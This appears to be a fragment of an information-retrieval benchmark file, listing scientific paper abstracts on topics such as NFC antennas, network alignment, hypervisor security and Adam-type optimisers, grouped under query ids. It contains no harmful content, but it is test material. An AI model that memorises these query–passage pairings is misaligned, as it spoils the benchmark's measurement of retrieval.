"text": "The evaluation of interpretable machine learning systems is challenging, as explanation is almost always a means toward some downstream task. In this work, we carefully control a number of properties of logic-based explanations (overall length, number of repeated terms, etc.) to determine their effect on human ability to perform three basic tasks: simulating the system’s response, verification of a suggested response, and counterfactual reasoning. Our findings about how each of these properties affect the ability of humans to perform each task provide insights on how we might construct regularizers to optimize for task performance.",
"title": ""
},
{
"docid": "77ac062b64cf9bb08d4115326504dbeb",
"text": "Near Field Communication (NFC) is a very intuitive way to open a communication link, to authenticate, or to implement a payment by simply bringing two mobile personal devices closely together. NFC is based upon reliable contactless card technology and combines most prominent protocol standards in a specification driven by the NFC Forum. Devices with a NFC interface operate at 13.56 MHz via inductive loop antennas. However, these operate operated in a very different environment than contactless cards. Metal, the presence of several other antennas, and market demands for compact electronic devices are driving requirements for antennas to operate on ferrite foils, resulting in significant tolerances on antenna impedance. In NFC Reader mode, the antennas operate in a resonance circuit, making this de-tuning critical. This paper presents a prototype implementation for automated antenna impedance adjustment based upon Digitally Tunable Capacitors (DTCs). To show the benefit, the paper explains efficiency for contactless power transfer by practical measurements, comparing three scenarios-fixed impedance adjustment, matching with tolerance, and automated readjustment using a DTC.",
"title": ""
},
{
"docid": "77ea0e24066d028d085069cb8f6733e0",
"text": "Road scene reconstruction is a fundamental and crucial module at the perception phase for autonomous vehicles, and will influence the later phase, such as object detection, motion planing and path planing. Traditionally, self-driving car uses Lidar, camera or fusion of the two kinds of sensors for sensing the environment. However, single Lidar or camera-based approaches will miss crucial information, and the fusion-based approaches often consume huge computing resources. We firstly propose a conditional Generative Adversarial Networks (cGANs)-based deep learning model that can rebuild rich semantic scene images from upsampled Lidar point clouds only. This makes it possible to remove cameras to reduce resource consumption and improve the processing rate. Simulation on the KITTI dataset also demonstrates that our model can reestablish color imagery from a single Lidar point cloud, and is effective enough for real time sensing on autonomous driving vehicles.",
"title": ""
},
{
"docid": "cc432f79b99f348863e1371dd1511b77",
"text": "Most evaluation metrics for machine translation (MT) require reference translations for each sentence in order to produce a score reflecting certain aspects of its quality. The de facto metrics, BLEU and NIST, are known to have good correlation with human evaluation at the corpus level, but this is not the case at the segment level. As an attempt to overcome these two limitations, we address the problem of evaluating the quality of MT as a prediction task, where reference-independent features are extracted from the input sentences and their translation, and a quality score is obtained based on models produced from training data. We show that this approach yields better correlation with human evaluation as compared to commonly used metrics, even with models trained on different MT systems, language-pairs and text domains.",
"title": ""
},
{
"docid": "a4d8b3e9f60dfe8adbc95448a9feea2e",
"text": "In this article, I discuss material which is related to the recent proof of Fermat’s Last Theorem: elliptic curves, modular forms, Galois representations and their deformations, Frey’s construction, and the conjectures of Serre and of Taniyama-Shimura.",
"title": ""
},
{
"docid": "73d9461101dc15f93f52d2ab9b8c0f39",
"text": "The need for mining structured data has increased in the past few years. One of the best studied data structures in computer science and discrete mathematics are graphs. It can therefore be no surprise that graph based data mining has become quite popular in the last few years.This article introduces the theoretical basis of graph based data mining and surveys the state of the art of graph-based data mining. Brief descriptions of some representative approaches are provided as well.",
"title": ""
},
{
"docid": "39b5095283fd753013c38459a93246fd",
"text": "OBJECTIVE\nTo determine whether cannabis use in adolescence predisposes to higher rates of depression and anxiety in young adulthood.\n\n\nDESIGN\nSeven wave cohort study over six years.\n\n\nSETTING\n44 schools in the Australian state of Victoria.\n\n\nPARTICIPANTS\nA statewide secondary school sample of 1601 students aged 14-15 followed for seven years.\n\n\nMAIN OUTCOME MEASURE\nInterview measure of depression and anxiety (revised clinical interview schedule) at wave 7.\n\n\nRESULTS\nSome 60% of participants had used cannabis by the age of 20; 7% were daily users at that point. Daily use in young women was associated with an over fivefold increase in the odds of reporting a state of depression and anxiety after adjustment for intercurrent use of other substances (odds ratio 5.6, 95% confidence interval 2.6 to 12). Weekly or more frequent cannabis use in teenagers predicted an approximately twofold increase in risk for later depression and anxiety (1.9, 1.1 to 3.3) after adjustment for potential baseline confounders. In contrast, depression and anxiety in teenagers predicted neither later weekly nor daily cannabis use.\n\n\nCONCLUSIONS\nFrequent cannabis use in teenage girls predicts later depression and anxiety, with daily users carrying the highest risk. Given recent increasing levels of cannabis use, measures to reduce frequent and heavy recreational use seem warranted.",
"title": ""
},
{
"docid": "e7f91b90eab54dfd7f115a3a0225b673",
"text": "The recent trend of outsourcing network functions, aka. middleboxes, raises confidentiality and integrity concern on redirected packet, runtime state, and processing result. The outsourced middleboxes must be protected against cyber attacks and malicious service provider. It is challenging to simultaneously achieve strong security, practical performance, complete functionality and compatibility. Prior software-centric approaches relying on customized cryptographic primitives fall short of fulfilling one or more desired requirements. In this paper, after systematically addressing key challenges brought to the fore, we design and build a secure SGX-assisted system, LightBox, which supports secure and generic middlebox functions, efficient networking, and most notably, lowoverhead stateful processing. LightBox protects middlebox from powerful adversary, and it allows stateful network function to run at nearly native speed: it adds only 3μs packet processing delay even when tracking 1.5M concurrent flows.",
"title": ""
},
{
"docid": "a66765e24b6cfdab2cc0b30de8afd12e",
"text": "A broadband transition structure from rectangular waveguide (RWG) to microstrip line (MSL) is presented for the realization of the low-loss packaging module using Low-temperature co-fired ceramic (LTCC) technology at W-band. In this transition, a cavity structure is buried in LTCC layers, which provides the wide bandwidth, and a laminated waveguide (LWG) transition is designed, which provides the low-loss performance, as it reduces the radiation loss of conventional direct transition between RWG and MSL. The design procedure is also given. The measured results show that the insertion loss of better than 0.7 dB from 86 to 97 GHz can be achieved.",
"title": ""
},
{
"docid": "cfad1e8941f0a60f6978493c999a5850",
"text": "We propose SecVisor, a tiny hypervisor that ensures code integrity for commodity OS kernels. In particular, SecVisor ensures that only user-approved code can execute in kernel mode over the entire system lifetime. This protects the kernel against code injection attacks, such as kernel rootkits. SecVisor can achieve this propertyeven against an attacker who controls everything but the CPU, the memory controller, and system memory chips. Further, SecVisor can even defend against attackers with knowledge of zero-day kernel exploits.\n Our goal is to make SecVisor amenable to formal verificationand manual audit, thereby making it possible to rule out known classes of vulnerabilities. To this end, SecVisor offers small code size and small external interface. We rely on memory virtualization to build SecVisor and implement two versions, one using software memory virtualization and the other using CPU-supported memory virtualization. The code sizes of the runtime portions of these versions are 1739 and 1112 lines, respectively. The size of the external interface for both versions of SecVisor is 2 hypercalls. It is easy to port OS kernels to SecVisor. We port the Linux kernel version 2.6.20 by adding 12 lines and deleting 81 lines, out of a total of approximately 4.3 million lines of code in the kernel.",
"title": ""
},
{
"docid": "4fea6fb309d496f9b4fd281c80a8eed7",
"text": "Network alignment is the problem of matching the nodes of two graphs, maximizing the similarity of the matched nodes and the edges between them. This problem is encountered in a wide array of applications---from biological networks to social networks to ontologies---where multiple networked data sources need to be integrated. Due to the difficulty of the task, an accurate alignment can rarely be found without human assistance. Thus, it is of great practical importance to develop network alignment algorithms that can optimally leverage experts who are able to provide the correct alignment for a small number of nodes. Yet, only a handful of existing works address this active network alignment setting.\n The majority of the existing active methods focus on absolute queries (\"are nodes a and b the same or not?\"), whereas we argue that it is generally easier for a human expert to answer relative queries (\"which node in the set b1,...,bn is the most similar to node a?\"). This paper introduces two novel relative-query strategies, TopMatchings and GibbsMatchings, which can be applied on top of any network alignment method that constructs and solves a bipartite matching problem. Our methods identify the most informative nodes to query by sampling the matchings of the bipartite graph associated to the network-alignment instance.\n We compare the proposed approaches to several commonly-used query strategies and perform experiments on both synthetic and real-world datasets. Our sampling-based strategies yield the highest overall performance, outperforming all the baseline methods by more than 15 percentage points in some cases. In terms of accuracy, TopMatchings and GibbsMatchings perform comparably. However, GibbsMatchings is significantly more scalable, but it also requires hyperparameter tuning for a temperature parameter.",
"title": ""
},
{
"docid": "026191acb86a5c59889e0cf0491a4f7d",
"text": "We present a new dataset, ideal for Head Pose and Eye Gaze Estimation algorithm testings. Our dataset was recorded using a monocular system, and no information regarding camera or environment parameters is offered, making the dataset ideal to be tested with algorithms that do not utilize such information and do not require any specific equipment in terms of hardware.",
"title": ""
},
{
"docid": "ab0994331a2074fe9b635342fed7331c",
"text": "This paper investigates to identify the requirement and the development of machine learning-based mobile big data analysis through discussing the insights of challenges in the mobile big data (MBD). Furthermore, it reviews the state-of-the-art applications of data analysis in the area of MBD. Firstly, we introduce the development of MBD. Secondly, the frequently adopted methods of data analysis are reviewed. Three typical applications of MBD analysis, namely wireless channel modeling, human online and offline behavior analysis, and speech recognition in the internet of vehicles, are introduced respectively. Finally, we summarize the main challenges and future development directions of mobile big data analysis.",
"title": ""
},
{
"docid": "a9ebd89c2f9c9b33ed9c69b4a9da221a",
"text": "Continuum robots, which have continuous mechanical structures comparable to the flexibility in elephant trunks and octopus arms, have been primarily geared toward the medical and defense communities. In space, however, NASA projects these robots to have a place in irregular inspection routines. The inherent compliance and bending of these continuum arms are especially suitable for inspection in obstructed spaces to ensure proper equipment functionality. In this paper, we propose a new solution that improves on the functionality of previous continuum robots, via a novel mechanical scaly layer-jamming design. Layer-jamming assisted continuum arms have previously required pneumatic sources for actuation, which limit their portability and usage in aerospace applications. This paper combines the compliance of continuum arms and stiffness modulation of the layer jamming mechanism to design a new hybrid layer jamming continuum arm. The novel design uses an electromechanical actuation which eliminates the pneumatic actuation therefore making it compact and portable.",
"title": ""
},
{
"docid": "6149a6aaa9c39a1e02ab8fbe64fcb62b",
"text": "The thoracic diaphragm is a dome-shaped septum, composed of muscle surrounding a central tendon, which separates the thoracic and abdominal cavities. The function of the diaphragm is to expand the chest cavity during inspiration and to promote occlusion of the gastroesophageal junction. This article provides an overview of the normal anatomy of the diaphragm.",
"title": ""
}
] | scidocsrr |
4bc498fa731cf17216b887d0f0891bbb | User identification across multiple social networks | [
{
"docid": "d879e53880baeb2da303179195731b03",
"text": "Semantic search has been one of the motivations of the semantic Web since it was envisioned. We propose a model for the exploitation of ontology-based knowledge bases to improve search over large document repositories. In our view of information retrieval on the semantic Web, a search engine returns documents rather than, or in addition to, exact values in response to user queries. For this purpose, our approach includes an ontology-based scheme for the semiautomatic annotation of documents and a retrieval system. The retrieval model is based on an adaptation of the classic vector-space model, including an annotation weighting algorithm, and a ranking algorithm. Semantic search is combined with conventional keyword-based retrieval to achieve tolerance to knowledge base incompleteness. Experiments are shown where our approach is tested on corpora of significant scale, showing clear improvements with respect to keyword-based search",
"title": ""
}
] | [
{
"docid": "9ed3ec5936c2e4fd383618ab11b4a07e",
"text": "With the large-scale adoption of GPS equipped mobile sensing devices, positional data generated by moving objects (e.g., vehicles, people, animals) are being easily collected. Such data are typically modeled as streams of spatio-temporal (x,y,t) points, called trajectories. In recent years trajectory management research has progressed significantly towards efficient storage and indexing techniques, as well as suitable knowledge discovery. These works focused on the geometric aspect of the raw mobility data. We are now witnessing a growing demand in several application sectors (e.g., from shipment tracking to geo-social networks) on understanding the semantic behavior of moving objects. Semantic behavior refers to the use of semantic abstractions of the raw mobility data, including not only geometric patterns but also knowledge extracted jointly from the mobility data and the underlying geographic and application domains information. The core contribution of this article lies in a semantic model and a computation and annotation platform for developing a semantic approach that progressively transforms the raw mobility data into semantic trajectories enriched with segmentations and annotations. We also analyze a number of experiments we did with semantic trajectories in different domains.",
"title": ""
},
{
"docid": "9649b5411f6d90b18b2e0ec1a2620952",
"text": "This paper describes a method for the enhancement of curvilinear structures such as vessels and bronchi in three-dimensional (3-D) medical images. A 3-D line enhancement filter is developed with the aim of discriminating line structures from other structures and recovering line structures of various widths. The 3-D line filter is based on a combination of the eigenvalues of the 3-D Hessian matrix. Multi-scale integration is formulated by taking the maximum among single-scale filter responses, and its characteristics are examined to derive criteria for the selection of parameters in the formulation. The resultant multi-scale line-filtered images provide significantly improved segmentation and visualization of curvilinear structures. The usefulness of the method is demonstrated by the segmentation and visualization of brain vessels from magnetic resonance imaging (MRI) and magnetic resonance angiography (MRA), bronchi from a chest CT, and liver vessels (portal veins) from an abdominal CT.",
"title": ""
},
{
"docid": "10bc2f9827aa9a53e3ca4b7188bd91c3",
"text": "Learning hash functions across heterogenous high-dimensional features is very desirable for many applications involving multi-modal data objects. In this paper, we propose an approach to obtain the sparse codesets for the data objects across different modalities via joint multi-modal dictionary learning, which we call sparse multi-modal hashing (abbreviated as SM2H). In SM2H, both intra-modality similarity and inter-modality similarity are first modeled by a hypergraph, then multi-modal dictionaries are jointly learned by Hypergraph Laplacian sparse coding. Based on the learned dictionaries, the sparse codeset of each data object is acquired and conducted for multi-modal approximate nearest neighbor retrieval using a sensitive Jaccard metric. The experimental results show that SM2H outperforms other methods in terms of mAP and Percentage on two real-world data sets.",
"title": ""
},
{
"docid": "94af221c857462b51e14f527010fccde",
"text": "The immunology of the hygiene hypothesis of allergy is complex and involves the loss of cellular and humoral immunoregulatory pathways as a result of the adoption of a Western lifestyle and the disappearance of chronic infectious diseases. The influence of diet and reduced microbiome diversity now forms the foundation of scientific thinking on how the allergy epidemic occurred, although clear mechanistic insights into the process in humans are still lacking. Here we propose that barrier epithelial cells are heavily influenced by environmental factors and by microbiome-derived danger signals and metabolites, and thus act as important rheostats for immunoregulation, particularly during early postnatal development. Preventive strategies based on this new knowledge could exploit the diversity of the microbial world and the way humans react to it, and possibly restore old symbiotic relationships that have been lost in recent times, without causing disease or requiring a return to an unhygienic life style.",
"title": ""
},
{
"docid": "6cabc50fda1107a61c2704c4917b9501",
"text": "A vehicle tracking system is very useful for tracking the movement of a vehicle from any location at any time. In this work, real time Google map and Arduino based vehicle tracking system is implemented with Global Positioning System (GPS) and Global system for mobile communication (GSM) technology. GPS module provides geographic coordinates at regular time intervals. Then the GSM module transmits the location of vehicle to cell phone of owner/user in terms of latitude and longitude. At the same time, location is displayed on LCD. Finally, Google map displays the location and name of the place on cell phone. Thus, owner/user will be able to continuously monitor a moving vehicle using the cell phone. In order to show the feasibility and effectiveness of the system, this work presents experimental result of the vehicle tracking system. The proposed system is user friendly and ensures safety and surveillance at low maintenance cost.",
"title": ""
},
{
"docid": "33078b816200d68685518464292d73a7",
"text": "Program Synthesis Without Full Specifications for Novel Applications Daniel Perelman Co-Chairs of the Supervisory Committee: Associate Professor Daniel Grossman Computer Science & Engineering Affiliate Professor Sumit Gulwani Computer Science & Engineering Program synthesis is a family of techniques that generate programs from a description of what the program should do but not how it should do it. By designing a program synthesis algorithm together with the user interaction model we show that by accepting small increases in user effort, it is easier to write the synthesizer and the need for specialization of the synthesizer to a given domain is reduced without losing performance. In this work, we target three tasks to show the breadth of our methodology: code completion, end-user programming-by-example for data transformations, and feedback for introductory programming assignments. For each of these tasks, we develop an interaction model and program synthesis algorithm together to best support the user. In the first, we use partial expressions to allow programmers to express exactly what they don’t know and want the completion system to fill in. In the second, we use the sequence of examples to inform building up larger programs iteratively. In the last, we use attempts from other students on the same assignment to mine corrections.",
"title": ""
},
{
"docid": "2271347e3b04eb5a73466aecbac4e849",
"text": "[1] Robin Jia, Percy Liang. “Adversarial examples for evaluating reading comprehension systems.” In EMNLP 2017. [2] Caiming Xiong, Victor Zhong, Richard Socher. “DCN+ Mixed objective and deep residual coattention for question answering.” In ICLR 2018. [3] Danqi Chen, Adam Fisch, Jason Weston, Antoine Bordes. “Reading wikipedia to answer open-domain questions.” In ACL 2017. Check out more of our work at https://einstein.ai/research Method",
"title": ""
},
{
"docid": "820c8869640edacb874fe7cccc265b13",
"text": "The present document may be made available in more than one electronic version or in print. In any case of existing or perceived difference in contents between such versions, the reference version is the Portable Document Format (PDF). In case of dispute, the reference shall be the printing on ETSI printers of the PDF version kept on a specific network drive within ETSI Secretariat. No part may be reproduced except as authorized by written permission. The copyright and the foregoing restriction extend to reproduction in all media. DECT TM , PLUGTESTS TM , UMTS TM and the ETSI logo are Trade Marks of ETSI registered for the benefit of its Members. 3GPP TM and LTE™ are Trade Marks of ETSI registered for the benefit of its Members and of the 3GPP Organizational Partners. GSM® and the GSM logo are Trade Marks registered and owned by the GSM Association.",
"title": ""
},
{
"docid": "79f4aad68ba11831c908dface92984a6",
"text": "Purely passive devices (e.g. dynamic ankle-foot orthoses (DAFOs)) can store and release elastic energy in rigid, non-hinged frames to assist walking without assistance from motors. This lightweight, simplistic approach has been shown to cause small increases in both walking speed and economy poststroke [6-8]. However there are downsides to current DAFO designs. First, rigid, non-hinged DAFOs restrict full ankle joint range of motion, allowing only limited rotation in the sagittal plane. Second, and perhaps more crucialcurrent DAFOs do not allow free ankle rotation during swing, making it difficult to dorsiflex in preparation for heel strike. Inability to dorsiflex freely during swing could impose a significant metabolic penalty, especially in healthy populations [9].",
"title": ""
},
{
"docid": "785bd7171800d3f2f59f90838a84dc37",
"text": "BACKGROUND\nCancer is considered to develop due to disruptions in the tissue microenvironment in addition to genetic disruptions in the tumor cells themselves. The two most important microenvironmental disruptions in cancer are arguably tissue hypoxia and disrupted circadian rhythmicity. Endothelial cells, which line the luminal side of all blood vessels transport oxygen or endocrine circadian regulators to the tissue and are therefore of key importance for circadian disruption and hypoxia in tumors.\n\n\nSCOPE OF REVIEW\nHere I review recent findings on the role of circadian rhythms and hypoxia in cancer and metastasis, with particular emphasis on how these pathways link tumor metastasis to pathological functions of blood vessels. The involvement of disrupted cell metabolism and redox homeostasis in this context and the use of novel zebrafish models for such studies will be discussed.\n\n\nMAJOR CONCLUSIONS\nCircadian rhythms and hypoxia are involved in tumor metastasis on all levels from pathological deregulation of the cell to the tissue and the whole organism. Pathological tumor blood vessels cause hypoxia and disruption in circadian rhythmicity which in turn drives tumor metastasis. Zebrafish models may be used to increase our understanding of the mechanisms behind hypoxia and circadian regulation of metastasis.\n\n\nGENERAL SIGNIFICANCE\nDisrupted blood flow in tumors is currently seen as a therapeutic goal in cancer treatment, but may drive invasion and metastasis via pathological hypoxia and circadian clock signaling. Understanding the molecular details behind such regulation is important to optimize treatment for patients with solid tumors in the future. This article is part of a Special Issue entitled Redox regulation of differentiation and de-differentiation.",
"title": ""
},
{
"docid": "b28f42d2a9a7287cf75a7936aa9865be",
"text": "This work presents a novel simulation methodology applied to a 5-DOF manipulator. The work includes mathematical modeling of the direct, inverse and differential kinematics as well as the dynamics of the manipulator. The method implements the path following in the 3D space and uses the Matlab-Simulink approach. Several paths were tested to verify the method. This methodology can be used with different robots to test the behavior and control laws.",
"title": ""
},
{
"docid": "77f60100af0c9556e5345ee1b04d8171",
"text": "SDNET2018 is an annotated image dataset for training, validation, and benchmarking of artificial intelligence based crack detection algorithms for concrete. SDNET2018 contains over 56,000 images of cracked and non-cracked concrete bridge decks, walls, and pavements. The dataset includes cracks as narrow as 0.06 mm and as wide as 25 mm. The dataset also includes images with a variety of obstructions, including shadows, surface roughness, scaling, edges, holes, and background debris. SDNET2018 will be useful for the continued development of concrete crack detection algorithms based on deep convolutional neural networks (DCNNs), which are a subject of continued research in the field of structural health monitoring. The authors present benchmark results for crack detection using SDNET2018 and a crack detection algorithm based on the AlexNet DCNN architecture. SDNET2018 is freely available at https://doi.org/10.15142/T3TD19.",
"title": ""
},
{
"docid": "9ac00559a52851ffd2e33e376dd58b62",
"text": "ARM servers are becoming increasingly common, making server technologies such as virtualization for ARM of growing importance. We present the first study of ARM virtualization performance on server hardware, including multicore measurements of two popular ARM and x86 hypervisors, KVM and Xen. We show how ARM hardware support for virtualization can enable much faster transitions between VMs and the hypervisor, a key hypervisor operation. However, current hypervisor designs, including both Type 1 hypervisors such as Xen and Type 2 hypervisors such as KVM, are not able to leverage this performance benefit for real application workloads. We discuss the reasons why and show that other factors related to hypervisor software design and implementation have a larger role in overall performance. Based on our measurements, we discuss changes to ARM's hardware virtualization support that can potentially bridge the gap to bring its faster VM-to-hypervisor transition mechanism to modern Type 2 hypervisors running real applications. These changes have been incorporated into the latest ARM architecture.",
"title": ""
},
{
"docid": "6a04b4da4e77decf5f783e2edcc81d5b",
"text": "Document-level sentiment classification is an important NLP task. The state of the art shows that attention mechanism is particularly effective on document-level sentiment classification. Despite the success of previous attention mechanism, it neglects the correlations among inputs (e.g., words in a sentence), which can be useful for improving the classification result. In this paper, we propose a novel Adaptive Attention Network (AAN) to explicitly model the correlations among inputs. Our AAN has a two-layer attention hierarchy. It first learns an attention score for each input. Given each input’s embedding and attention score, it then computes a weighted sum over all the words’ embeddings. This weighted sum is seen as a “context” embedding, aggregating all the inputs. Finally, to model the correlations among inputs, it computes another attention score for each input, based on the input embedding and the context embedding. These new attention scores are our final output of AAN. In document-level sentiment classification, we apply AAN to model words in a sentence and sentences in a review. We evaluate AAN on three public data sets, and show that it outperforms state-of-the-art baselines.",
"title": ""
},
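The adaptive attention described in the preceding passage can be read as two stacked scoring passes: a first pass whose scores build a context vector, and a second pass that re-scores each input against its own embedding plus that context. The NumPy sketch below illustrates this structure under the assumption of simple tanh-plus-linear scoring functions; the parameterisation, dimensions, and names are illustrative, not the paper's exact model.

```python
import numpy as np

def softmax(z):
    z = z - z.max()
    e = np.exp(z)
    return e / e.sum()

def adaptive_attention(X, W1, w1, W2, w2):
    """X: (n, d) input embeddings; returns the final (second-layer) attention weights."""
    # First pass: one attention score per input
    a1 = softmax(np.tanh(X @ W1) @ w1)
    # Context embedding: attention-weighted sum of all input embeddings
    context = a1 @ X
    # Second pass: re-score each input given its embedding and the shared context
    paired = np.concatenate([X, np.tile(context, (X.shape[0], 1))], axis=1)
    a2 = softmax(np.tanh(paired @ W2) @ w2)
    return a2

# Toy usage: 5 word embeddings of dimension 8
rng = np.random.default_rng(0)
X = rng.normal(size=(5, 8))
weights = rng.normal(size=(8, 16)), rng.normal(size=16), rng.normal(size=(16, 16)), rng.normal(size=16)
print(adaptive_attention(X, *weights))
```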
{
"docid": "1b063dfecff31de929383b8ab74f7f6b",
"text": "This paper studies a class of adaptive gradient based momentum algorithms that update the search directions and learning rates simultaneously using past gradients. This class, which we refer to as the “Adam-type”, includes the popular algorithms such as Adam (Kingma & Ba, 2014) , AMSGrad (Reddi et al., 2018) , AdaGrad (Duchi et al., 2011). Despite their popularity in training deep neural networks (DNNs), the convergence of these algorithms for solving non-convex problems remains an open question. In this paper, we develop an analysis framework and a set of mild sufficient conditions that guarantee the convergence of the Adam-type methods, with a convergence rate of order O(log T/ √ T ) for non-convex stochastic optimization. Our convergence analysis applies to a new algorithm called AdaFom (AdaGrad with First Order Momentum). We show that the conditions are essential, by identifying concrete examples in which violating the conditions makes an algorithm diverge. Besides providing one of the first comprehensive analysis for Adam-type methods in the non-convex setting, our results can also help the practitioners to easily monitor the progress of algorithms and determine their convergence behavior.",
"title": ""
},
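The Adam-type family summarised above shares a single update template, x_{t+1} = x_t - α_t m_t / sqrt(v_t), with the variants differing mainly in how the second-moment term v_t is accumulated. The sketch below illustrates that shared structure for Adam, AMSGrad, and AdaGrad-with-first-order-momentum (AdaFom); bias correction and step-size schedules are omitted, and the defaults and function names are assumptions.

```python
import numpy as np

def adam_type_step(x, grad, state, lr=1e-3, beta1=0.9, beta2=0.999,
                   eps=1e-8, variant="adam"):
    """One generic Adam-type update; `state` is (m, v, v_hat)."""
    m, v, v_hat = state
    m = beta1 * m + (1 - beta1) * grad               # first-order momentum
    if variant == "adafom":                          # AdaGrad-style accumulation
        v = v + grad ** 2
    else:                                            # Adam / AMSGrad: EMA of squared grads
        v = beta2 * v + (1 - beta2) * grad ** 2
    v_hat = np.maximum(v_hat, v) if variant == "amsgrad" else v
    x = x - lr * m / (np.sqrt(v_hat) + eps)
    return x, (m, v, v_hat)

# Toy usage on f(x) = ||x||^2, whose gradient is 2x
x = np.array([1.0, -2.0])
state = (np.zeros_like(x), np.zeros_like(x), np.zeros_like(x))
for _ in range(1000):
    x, state = adam_type_step(x, 2 * x, state, variant="amsgrad")
print(x)
```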
{
"docid": "36a616fb73473edecb1df2db0f3d1870",
"text": "We study online learnability of a wide class of problems, extending the results of Rakhlin et al. (2010a) to general notions of performance measure well beyond external regret. Our framework simultaneously captures such well-known notions as internal and general Φ-regret, learning with non-additive global cost functions, Blackwell's approachability, calibration of forecasters, and more. We show that learnability in all these situations is due to control of the same three quantities: a martingale convergence term, a term describing the ability to perform well if future is known, and a generalization of sequential Rademacher complexity, studied in Rakhlin et al. (2010a). Since we directly study complexity of the problem instead of focusing on efficient algorithms, we are able to improve and extend many known results which have been previously derived via an algorithmic construction. Disciplines Computer Sciences | Statistics and Probability This conference paper is available at ScholarlyCommons: http://repository.upenn.edu/statistics_papers/133 JMLR: Workshop and Conference Proceedings 19 (2011) 559–594 24th Annual Conference on Learning Theory Online Learning: Beyond Regret Alexander Rakhlin Department of Statistics University of Pennsylvania Karthik Sridharan TTI-Chicago Ambuj Tewari Department of Computer Science University of Texas at Austin Editor: Sham Kakade, Ulrike von Luxburg Abstract We study online learnability of a wide class of problems, extending the results of Rakhlin et al. (2010a) to general notions of performance measure well beyond external regret. Our framework simultaneously captures such well-known notions as internal and general Φregret, learning with non-additive global cost functions, Blackwell’s approachability, calibration of forecasters, and more. We show that learnability in all these situations is due to control of the same three quantities: a martingale convergence term, a term describing the ability to perform well if future is known, and a generalization of sequential Rademacher complexity, studied in Rakhlin et al. (2010a). Since we directly study complexity of the problem instead of focusing on efficient algorithms, we are able to improve and extend many known results which have been previously derived via an algorithmic construction.We study online learnability of a wide class of problems, extending the results of Rakhlin et al. (2010a) to general notions of performance measure well beyond external regret. Our framework simultaneously captures such well-known notions as internal and general Φregret, learning with non-additive global cost functions, Blackwell’s approachability, calibration of forecasters, and more. We show that learnability in all these situations is due to control of the same three quantities: a martingale convergence term, a term describing the ability to perform well if future is known, and a generalization of sequential Rademacher complexity, studied in Rakhlin et al. (2010a). Since we directly study complexity of the problem instead of focusing on efficient algorithms, we are able to improve and extend many known results which have been previously derived via an algorithmic construction.",
"title": ""
},
{
"docid": "9fb27226848da6b18fdc1e3b3edf79c9",
"text": "In the last few years thousands of scientific papers have investigated sentiment analysis, several startups that measure opinions on real data have emerged and a number of innovative products related to this theme have been developed. There are multiple methods for measuring sentiments, including lexical-based and supervised machine learning methods. Despite the vast interest on the theme and wide popularity of some methods, it is unclear which one is better for identifying the polarity (i.e., positive or negative) of a message. Accordingly, there is a strong need to conduct a thorough apple-to-apple comparison of sentiment analysis methods, as they are used in practice, across multiple datasets originated from different data sources. Such a comparison is key for understanding the potential limitations, advantages, and disadvantages of popular methods. This article aims at filling this gap by presenting a benchmark comparison of twenty-four popular sentiment analysis methods (which we call the state-of-the-practice methods). Our evaluation is based on a benchmark of eighteen labeled datasets, covering messages posted on social networks, movie and product reviews, as well as opinions and comments in news articles. Our results highlight the extent to which the prediction performance of these methods varies considerably across datasets. Aiming at boosting the development of this research area, we open the methods’ codes and datasets used in this article, deploying them in a benchmark system, which provides an open API for accessing and comparing sentence-level sentiment analysis methods.",
"title": ""
},
{
"docid": "d06c91afbfd79e40d0d6fe326e3be957",
"text": "This meta-analysis included 66 studies (N = 4,176) on parental antecedents of attachment security. The question addressed was whether maternal sensitivity is associated with infant attachment security, and what the strength of this relation is. It was hypothesized that studies more similar to Ainsworth's Baltimore study (Ainsworth, Blehar, Waters, & Wall, 1978) would show stronger associations than studies diverging from this pioneering study. To create conceptually homogeneous sets of studies, experts divided the studies into 9 groups with similar constructs and measures of parenting. For each domain, a meta-analysis was performed to describe the central tendency, variability, and relevant moderators. After correction for attenuation, the 21 studies (N = 1,099) in which the Strange Situation procedure in nonclinical samples was used, as well as preceding or concurrent observational sensitivity measures, showed a combined effect size of r(1,097) = .24. According to Cohen's (1988) conventional criteria, the association is moderately strong. It is concluded that in normal settings sensitivity is an important but not exclusive condition of attachment security. Several other dimensions of parenting are identified as playing an equally important role. In attachment theory, a move to the contextual level is required to interpret the complex transactions between context and sensitivity in less stable and more stressful settings, and to pay more attention to nonshared environmental influences.",
"title": ""
},
{
"docid": "760a303502d732ece14e3ea35c0c6297",
"text": "Data centers are experiencing a remarkable growth in the number of interconnected servers. Being one of the foremost data center design concerns, network infrastructure plays a pivotal role in the initial capital investment and ascertaining the performance parameters for the data center. Legacy data center network (DCN) infrastructure lacks the inherent capability to meet the data centers growth trend and aggregate bandwidth demands. Deployment of even the highest-end enterprise network equipment only delivers around 50% of the aggregate bandwidth at the edge of network. The vital challenges faced by the legacy DCN architecture trigger the need for new DCN architectures, to accommodate the growing demands of the ‘cloud computing’ paradigm. We have implemented and simulated the state of the art DCN models in this paper, namely: (a) legacy DCN architecture, (b) switch-based, and (c) hybrid models, and compared their effectiveness by monitoring the network: (a) throughput and (b) average packet delay. The presented analysis may be perceived as a background benchmarking study for the further research on the simulation and implementation of the DCN-customized topologies and customized addressing protocols in the large-scale data centers. We have performed extensive simulations under various network traffic patterns to ascertain the strengths and inadequacies of the different DCN architectures. Moreover, we provide a firm foundation for further research and enhancement in DCN architectures. Copyright © 2012 John Wiley & Sons, Ltd.",
"title": ""
},
{
"docid": "54afd49e0853e258916e2a36605177f0",
"text": "Novolac type liquefied wood/phenol/formaldehyde (LWPF) resins were synthesized from liquefied wood and formaldehyde. The average molecular weight of the LWPF resin made from the liquefied wood reacted in an atmospheric three neck flask increased with increasing P/W ratio. However, it decreased with increasing phenol/wood ratio when using a sealed Parr reactor. On average, the LWPF resin made from the liquefied wood reacted in the Parr reactor had lower molecular weight than those from the atmospheric three neck flask. The infrared spectra of the LWPF resins were similar to that of the conventional novolac resin but showed a major difference at the 1800–1600 cm-1 region. These results indicate that liquefied wood could partially substitute phenol in the novolac resin synthesis. The composites with the liquefied wood resin from the sealed Parr reactor yielded higher thickness swelling than those with the liquefied wood resin from the three neck flask likely due to the hydrophilic wood components incorporated in it and the lower cross-link density than the liquefied wood resin from the three neck flask during the resin cure process. Novolakartige LWPF-Harze wurden aus verflüssigtem Holz und Formaldehyd synthetisch hergestellt. Das mittlere Molekülgewicht des LWPF-Harzes, das aus verflüssigtem Holz in einem atmosphärischen Dreihals-Kolben hergestellt worden war, nahm mit steigendem Phenol/Holz-Verhältnis (P/W) zu, wohingegen es bei der Herstellung in einem versiegelten Parr Reaktor mit steigendem P/W-Verhältnis abnahm. LWPF-Harz, das aus verflüssigtem Holz 